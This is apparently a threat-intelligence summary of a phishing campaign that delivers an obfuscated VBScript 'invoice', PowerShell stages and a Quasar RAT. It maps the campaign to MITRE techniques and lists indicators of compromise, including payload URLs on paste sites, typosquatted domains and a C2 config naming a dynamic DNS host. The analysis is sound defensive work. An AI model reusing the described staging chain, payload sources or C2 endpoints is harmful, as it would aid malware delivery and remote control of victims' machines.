Threat Research

Another RAT Delivered Through VBS

Securonix

An email lure delivers a heavily obfuscated VBScript payload via a fake invoice email, then stages additional PowerShell-based components and a Quasar RAT from remote sites. The operation relies on typosquatting a domain hosted on a NameCheap PrivateEmail account and multiple stages of payload downloads to establish C2. #Quasar #Venom #alpineaerospace #NameCheap #PrivateEmail #VBScript #PowerShell

Keypoints

  • The attack begins with a spearphishing email referencing a fake due invoice that points to a URL instead of a login page.
  • A shared VBS file named INV.10931.vbs is hosted on a NameCheap PrivateEmail drive and modified by attacker using an address like [email protected].
  • The VBS is heavily obfuscated, starting with Unicode encoding (0xFFEE) and contains junk code to hinder analysis.
  • The script uses PowerShell and WScript.Shell to decode and execute additional payloads downloaded from pastebin and pasteio.
  • A Quasar RAT payload is downloaded and configured, with a C2 setup that includes local and remote endpoints.
  • typosquatting and domain impersonation (alpineaerospace.com/alpinearospace) are used to host and distribute the malware payloads via compromised domains.

MITRE Techniques

  • [T1566.002] Phishing – Spearphishing Link – The attack used an email referencing a fake due invoice that pointed to a URL. Quote: ‘The invoice icon pointed to a URL. Usually, such URLs display a fake login page asking for credentials. Not this time.’
  • [T1059.005] VBScript – The malicious script INV.10931.vbs is delivered and executed as a VBScript payload. Quote: ‘This file uses a lot of obfuscation techniques! The first one is the encoding.’
  • [T1027] Obfuscated/Compressed Files and Information – The VBScript is heavily obfuscated with Unicode encoding and junk code to hinder analysis. Quote: ‘Starting with 0xFFEE, the file is Unicode encoded.’
  • [T1059.001] PowerShell – The script uses PowerShell to decode and run payloads (e.g., ‘powershell -command …’). Quote: ‘powershell -command $KByHL;’
  • [T1105] Ingress Tool Transfer – The malware downloads additional payloads from remote sources (e.g., pastebin). Quote: ‘Another Base64 data is downloaded from pastebin.com.’
  • [T1071.001] Web Protocols – The C2 configuration shows endpoints used for command and control (e.g., ‘c2’: [ “127.0.0.1:4782”, “venomia[.]ddns[.]net:3202” ]). Quote: ‘{ “c2”: [ “127.0.0.1:4782”, “venomia[.]ddns[.]net:3202” ], “attr”: { … } }’

Indicators of Compromise

  • [File name] INV.10931.vbs – The malicious VBScript payload referenced by the shared file.
  • [File hash] 980b05b8a4ccbb444da3f7a1174e4c0e902a8ed199e4af2f3153e320809ab7cc – SHA-256 for INV.10931.vbs.
  • [Domain] alpineaerospace.com, alpinearospace.com – Typosquatted/impersonation domains used for hosting the drop.
  • [Email] [email protected] – Attacker-provided modification contact for the VBS file.
  • [URL] https://pastebin.com/raw/PUgmUTiH, https://pasteio.com/download/xVCDFXTnRsmj – External payload sources referenced by the script.
  • [IP address] 127.0.0.1:4782 – Local C2 endpoint observed in the Quasar RAT config.
  • [Domain] venomia.ddns.net:3202 – Remote C2 endpoint observed in the Quasar RAT config.

Read more: https://isc.sans.edu/diary/rss/29956

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint